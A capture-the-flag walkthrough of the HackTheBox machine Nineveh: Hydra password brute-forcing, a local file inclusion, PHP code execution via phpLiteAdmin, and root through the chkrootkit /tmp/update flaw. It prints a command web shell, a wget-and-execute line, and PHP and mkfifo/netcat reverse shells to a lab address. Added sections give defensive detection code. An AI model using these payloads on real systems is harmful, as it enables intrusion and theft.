Hackthebox.eu - Retired - Nineveh
Recon
I start with a simple up/down scan of all TCP ports.
nmap -T4 -p- -oX ./nmapb.xml nineveh.htb
Then I convert the output to HTML to make it easy to read:
xsltproc ./nmapb.xml -o ./nmapb.html
Looks like just ports 80 and 443 are open: a web server.
Let’s run nmap again with the -A switch to run all the scripts against just these two ports:
nmap -T4 -p80,443 -A -oX ./nmapf.xml nineveh.htb
Then convert that to HTML too:
xsltproc ./nmapf.xml -o ./nmapf.html
Looks like we have Apache 2.4.18 running on an Ubuntu server.
Let’s browse 80 and 443 to see what it serves up.
Port 80:
Port 443 (SSL):
Here is the cert info for SSL:
Not much help there.
Let’s start scanning these websites and see if we can find something. We will search against both ports since they could be serving different files.
I’ll start with Nikto on port 80:
nikto -h http://nineveh.htb
info.php is available, which is a default Apache page that gives a lot of info on the web server.
It also looks like it might be vulnerable to RFI (Remote File Inclusion).
Dirb on port 80 gave us just some default results:
info.php, which we already know about from Nikto; index.html, the default web page; and server-status, which we aren’t allowed to view.
Dirbuster found http://nineveh.htb/department/
Dirb on port 443 gave another location: https://nineveh.htb/db
phpLiteAdmin 1.9
Dirb and Nikto didn’t give me anything else to go on for a password here, so we are going to move over to exploitation and try to brute force this login page using Hydra.
Exploit
https://tools.kali.org/password-attacks/hydra
Hydra is a brute force tool that can be used to attack things like websites, FTP and a bunch of other services. It has a lot of different switches, and it took me a good 20 minutes to get all my settings right for this attack to work.
Before we can get to Hydra we need to look at the login form to get the parameters we need to feed it.
So let’s fire up Burp and capture a failed login attempt.
Here is the screenshot of the failed login attempt:
We need to gather the highlighted information to give to Hydra.
We need to know the site we want Hydra to attack, what parameters are being passed to the website, and what a failed response looks like.
So here is the final command we are going to issue to Hydra. I’ll break it down a little further.
hydra -P /usr/share/wordlists/rockyou.txt nineveh.htb http-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect" -S -l ''
Let’s walk through all the switches here.
-P: this switch indicates that we are going to use a password list
nineveh.htb: this is the domain we are attacking
http-post-form: this is the type of request being used
"/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect": this is the full form specification; let’s break it down
/db/index.php: this is the actual login page
password=^PASS^: ^PASS^ is the placeholder Hydra fills in from our word list
&remember=yes&login=Log+In&proc_login=true: these are the other parameters the website is expecting
:Incorrect: this is the failed login message we get
-S: indicates the site uses SSL
-l '': supplies an empty username
Looks like our password is password123.
Not quite admin/admin but pretty damn close.
Cool, we are logged in now.
Let’s go back and run Hydra against that department login too.
Just like before, let’s capture the login in Burp so we know what to feed Hydra.
I’m just going to assume there is a user named admin.
hydra -P /usr/share/wordlists/rockyou.txt nineveh.htb http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -l "admin"
Eventually we got back 1q2w3e4r5t as the password for admin.
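From the defender's side, both Hydra runs above leave a very recognisable trail in the Apache access log: a burst of POSTs to the same login path from one source address. This is an added example, not code from the original post; the log lines are constructed in Apache combined format, and the login paths, window and threshold are assumptions.

```python
# Added example (not from the original post): flag password-guessing bursts
# against the two login forms on this box in Apache combined-format access logs.
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
LOGIN_PATHS = {"/db/index.php", "/department/login.php"}  # login forms seen on this box
WINDOW_SECONDS = 60   # assumed window
THRESHOLD = 10        # assumed; a wordlist run is far noisier than any human

def parse_line(line):
    """Parse one access-log line into (ip, timestamp, method, path, status), or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path").split("?")[0], int(m.group("status"))

def find_bruteforce(lines, window=WINDOW_SECONDS, threshold=THRESHOLD):
    """Return {(ip, path): peak_count} for every source that POSTs to a login
    form at least `threshold` times inside any `window`-second span."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3] in LOGIN_PATHS:
            posts[(rec[0], rec[3])].append(rec[1])
    hits = {}
    for key, times in posts.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):          # sliding window over sorted timestamps
            while (t - times[start]).total_seconds() > window:
                start += 1
            if end - start + 1 >= threshold:
                hits[key] = max(hits.get(key, 0), end - start + 1)
    return hits

# Constructed sample: 12 guesses in 12 seconds from one host, one normal login from another.
SAMPLE_LOG = [
    f'10.10.14.18 - - [03/Aug/2017:10:00:{i:02d} +0000] "POST /db/index.php HTTP/1.1" '
    f'200 1843 "-" "Mozilla/5.0 (Hydra)"' for i in range(12)
] + ['10.10.14.99 - - [03/Aug/2017:10:05:00 +0000] "POST /department/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"']
```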
After we log in we get the department page.
Here is the notes section:
Looky there, it's calling a file to display ninevehNotes.txt. Let's see if we can use this for some LFI.
I started with just removing the files/ portion:
http://nineveh.htb/department/manage.php?notes=ninevehNotes.txt
Next I tried changing the file to /etc/passwd:
http://nineveh.htb/department/manage.php?notes=../../../../etc/passwd
Ok, let's add files/ninevehNotes.txt back but still with the /etc/passwd:
http://nineveh.htb/department/manage.php?notes=files/ninevehNotes.txt/../../../../etc/passwd
Hmm, that is a different error. This one seems more like an Apache error than the "no note selected" error. I suspect there is some sort of if statement behind this looking for the ninevehNotes part, because if it's not there we get the generic "no note selected" error, but with it we get the Apache error.
Let's try it again but take the files/ part out again:
http://nineveh.htb/department/manage.php?notes=/ninevehNotes.txt/../../../../etc/passwd
That worked, so we do have some LFI here in the department page.
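The post infers that manage.php only checks that the parameter contains ninevehNotes, which is exactly why the traversal still goes through. This added example (not the page's code; the notes directory and the inferred filter logic are assumptions) contrasts that substring check with a containment check on the resolved path, using the exact parameters tried above plus the /var/tmp database path used later in the post.

```python
# Added example (not from the original post): the substring filter that the
# post's symptoms suggest versus a containment check on the resolved path.
# Everything here is lexical; no files are opened. NOTES_DIR is an assumption.
import posixpath

NOTES_DIR = "/var/www/html/department/files"

def substring_filter(notes):
    """Inferred behaviour of manage.php: if the magic name is anywhere in the
    parameter, hand it straight to include(). Returns that path, or None."""
    if "ninevehNotes" not in notes:
        return None          # the generic "no note selected" branch
    return notes

def contained_open(notes):
    """Safer: join to the notes directory, normalise away any '..', and refuse
    anything that lands outside it or is not a .txt note."""
    if notes.startswith("/") or "\x00" in notes:
        return None
    resolved = posixpath.normpath(posixpath.join(NOTES_DIR, notes))
    if not resolved.startswith(NOTES_DIR + "/"):
        return None          # traversal escaped the directory
    if not resolved.endswith(".txt"):
        return None          # never include .php or arbitrary files
    return resolved

# The parameters the post tries, in order, plus the /var/tmp database used later.
PAYLOADS = [
    "ninevehNotes.txt",
    "../../../../etc/passwd",
    "files/ninevehNotes.txt/../../../../etc/passwd",
    "/ninevehNotes.txt/../../../../etc/passwd",
    "/var/tmp/ninevehNotes.php",
]

def compare(payloads=PAYLOADS):
    """Side by side: what each filter would open for each parameter."""
    return [(p, substring_filter(p), contained_open(p)) for p in payloads]
```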
Ok, now back to phpLiteAdmin. There is an exploit I found that we could use to execute some PHP that we create in a DB. For brevity I didn't include all my failed attempts to get this to work, but I can assure you they were numerous and very time consuming.
https://www.exploit-db.com/exploits/24044
So I created a DB named ninevehNotes.php (for the pesky filter).
I’m going to create a table named shell.
Then we will follow along with the exploit verbatim to see the POC here.
I created a text field named shell with <?php phpinfo()?>
So it creates the DB in the /var/tmp/ directory, which is not visible to the internet… damnit.
But we did find the LFI on the department site; hopefully we can leverage that to call the PHP?
http://nineveh.htb/department/manage.php?notes=/var/tmp/ninevehNotes.php
Cool, cool, cool, cool, we were able to LFI our PHP “db”.
Let's modify it again and see if we can get the box talking to us.
I’m just going to have it ping back to me first to make sure it allows outbound connections.
<?php exec('ping -c4 10.10.14.18')?>
I’ll update the value to this new PHP.
Then I set up a listener on my machine:
tcpdump -i tun0 -n icmp
Then refresh the notes page.
Ok, now we just need to modify this to hopefully get a shell session back instead of a ping.
Ok, we are going to create a PHP variable that we can pass to system() directly:
<?php echo system($_REQUEST["cmd"]); ?>
So now if we just add &cmd=*** after our URL it should execute whatever we put there as www-data:
http://nineveh.htb/department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=ls
I fought with trying to execute a reverse shell directly from the “db” PHP and couldn’t get it running.
Eventually I hosted a PHP file on my machine and used the db PHP to download and execute it.
My shell PHP, called circusmonkey.php:
<?php $sock=fsockopen("10.10.14.18",5555);exec("/bin/sh -i <&3 >&3 2>&3");?>
Then I inserted this code into the db to download and execute my PHP:
<?php system("wget http://10.10.14.18:8000/circusmonkey.php -O /tmp/circusmonkey.php; php /tmp/circusmonkey.php"); ?>
Set up a listener on my box:
nc -lvp 5555
Ok, we finally have a foothold.
Let's use python3 to get a little better shell here:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Poking around in the www folder I found a folder called secure_notes.
There is simply an HTML page that displays a PNG, and the PNG file itself.
I browsed to that site and saw this:
Let’s download this PNG and see if there is more to it than meets the eye.
I ran strings against it:
strings ./nineveh.png
And found some interesting output:
That sure looks like a private key for SSH, which would be great if SSH were open.
But wait, SSH is open, just not to the internet….
So we should be able to use the private key we found to SSH into localhost as amrois.
I made a file called key.txt on my Kali box and used SimpleHTTPServer to download it to nineveh.
ssh -i ./key.txt amrois@localhost (don’t forget to chmod the file to tighten its permissions or ssh will complain: chmod 600 ./key.txt)
Let's get that hash, yo.
Next I used my existing SimpleHTTPServer to download linpeas.sh to nineveh.
What is this?
A script to delete text files in /report.
I did a cat on all the files in the directory.
Looks like the output of a program that is looking for rootkits?
I grabbed one line and googled it.
This was among the top results:
https://forums.linuxmint.com/viewtopic.php?t=274218
Looks like a program called chkrootkit.
Googling around for a vulnerability in this program I found this:
https://lepetithacker.wordpress.com/2017/04/30/local-root-exploit-in-chkrootkit/
Apparently if we place a file called update in the /tmp directory it will execute as root when the program is run.
Considering the reports are being deleted every minute, I’m guessing chkrootkit is running on the same schedule, even though I didn't see it in the cron jobs... something else must be running it.
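A simple check for the condition this escalation relies on: an executable file named update sitting in the temp directory, owned by a non-root user, waiting for the scheduled chkrootkit run. This is an added example, not code from the original post; it plants and audits the file in a throwaway directory rather than the real /tmp, and the findings wording is my own.

```python
# Added example (not from the original post): audit a temp directory for the
# "update" file that an old chkrootkit would run as root, the condition this
# post's privilege escalation depends on. Uses a throwaway directory, not /tmp.
import os
import stat
import tempfile

def audit_update_file(tmp_dir):
    """Return a list of findings about `tmp_dir`/update.
    An empty list means the known bad condition is absent."""
    path = os.path.join(tmp_dir, "update")
    findings = []
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return findings
    findings.append(f"{path} exists")
    if stat.S_ISLNK(st.st_mode):
        findings.append("it is a symlink")
    if st.st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
        findings.append("it is executable")
    if st.st_uid != 0:
        findings.append(f"owned by uid {st.st_uid}, not root")
    return findings

def demo():
    """Constructed scenario: plant an executable 'update' in a temp dir, as the
    post does in /tmp, and return the audit results before and after."""
    with tempfile.TemporaryDirectory() as d:
        before = audit_update_file(d)
        p = os.path.join(d, "update")
        with open(p, "w") as f:
            f.write("#!/bin/sh\necho constructed\n")   # harmless stand-in payload
        os.chmod(p, 0o755)
        after = audit_update_file(d)
    return before, after
```

Running this on a schedule slightly ahead of the chkrootkit cron job would catch the planted file before it is executed.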
So as a POC I’m just going to make an executable that reads /root/root.txt and copies it to a directory I can read.
My update:
cat /root/root.txt > /tmp/circusmonkey2/root.txt
I placed the file in the /tmp directory and gave it executable rights:
chmod +x ./update
Then checked my output folder.
There we got our hash, but what about a root shell? It should be trivial now that we have found this exploit.
Well, looks like I figured out why my tries with netcat weren’t working when trying to get a foothold.
But mkfifo seems to work fine:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.18 3333 >/tmp/f
So let’s update our update to have this instead.
Wait for chkrootkit to run.
Much better.
This box was a doozy, one of the more difficult ones I’ve done lately.